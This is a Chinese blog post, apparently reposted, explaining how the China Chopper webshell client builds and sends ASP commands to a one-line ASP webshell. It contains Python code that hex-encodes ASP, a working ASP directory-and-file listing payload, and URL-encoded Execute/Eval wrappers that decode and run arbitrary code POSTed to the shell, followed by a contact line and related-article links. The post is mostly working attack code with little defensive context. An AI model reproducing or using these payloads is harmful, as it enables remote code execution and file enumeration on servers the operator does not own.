ASP 一句话执行ASP代码
来源:互联网 发布:河南微创网络 编辑:程序博客网 时间:2024/05/16 14:41
读取文件
self.asp_data=txt_Handle.asp_Handle(self.open_txt("asp.asp")) #asp内容
def asp_Handle(ASP_data): ASP_data=asp_x0_zs(ASP_data) #清除<% %> #ASP_data=asp_x2_zs(ASP_data) #清除'注释 #ASP_data=open_file_null(ASP_data) #清除空行 #ASP_data=asp_x2_zs(ASP_data) #清除'注释 #ASP_data=str_char(ASP_data) #对字符串处理 #ASP_data=urllib.quote(ASP_data) #quote URL编码 print ASP_data ASP_data=asp_shell(binascii.b2a_hex(ASP_data.encode("utf8"))) #hex #ASP_data=urllib.quote(ASP_data) #quote URL编码 return ASP_data对ASP代码做一些处理
Dim RR:RR=bd(Request("z1")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10):Next:For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10):Next:End If
在看菜刀的时候看菜刀对内容做出了一些处理
但是在菜刀的自写脚本中 并未对特殊字符做出处理 但是我在测试的时候还是发现还是要对一些字符做出处理否则无法运行 比如“
Response.Write("http://blog.csdn.net/webxscan")
strA = "document.write("&chr(34)&");"
##################################################################
上边说的是代码部分的处理
下面说代码的执行
{PASS}=Execute("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""{SCRIPT}"""")):Response.Write(""""|<-""""):Response.End"")")
#########
long=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""----------------"""")):Response.Write(""""|<-""""):Response.End"")")
这是执行 将代码转换成hex就行了放在{SCRIPT} 里
然后POST提交就行了
有兴趣可以联系我 神龙:QQ:29295842
blog: http://blog.csdn.net/webxscan
- ASP 一句话执行ASP代码
- asp一句话
- asp.net 点击提示 一句话代码。
- ASP一句话木马大全
- asp一句话木马原理
- asp.net定时执行代码
- asp.net jscript 一句话木马
- ASP一句话木马(转)
- asp.net执行SQL语句代码
- ASP.NET 定时执行一段代码
- ASP.NET(C#) 定时执行一段代码
- C#ASP.NET执行BAT批处理代码
- ASP.NET后台执行JS代码
- 编写一个asp代码执行器
- 寻求一段ASP+JS倒计时执行代码
- 一句话技巧:Asp.Net后置代码中输入JS提示语句(背景不会变白)
- asp.net(一句话2) 时间制式。。。
- 全面详尽剖析一句话asp木马
- JS倒计时:从某个固定时间开始倒记
- NSRunLoop理解之理论
- 天声人語 20151207 「批判の自由」の大切さ
- React Native学习-第一篇
- 《疯狂Android讲义》读书笔记2.Android应用的界面编程
- ASP 一句话执行ASP代码
- 日经春秋 20151207
- FLV 文件分析,包含dump h.264码流
- nyoj 860 变形0-1背包
- thinkphp 3.2 访问首页
- git常用命令
- 关于斐波那契数列的优化
- [远程桌面] 没有远程桌面授权服务器可以提供许可证
- week14---12月9日 JS内置对象——Math、Boolean、Number对象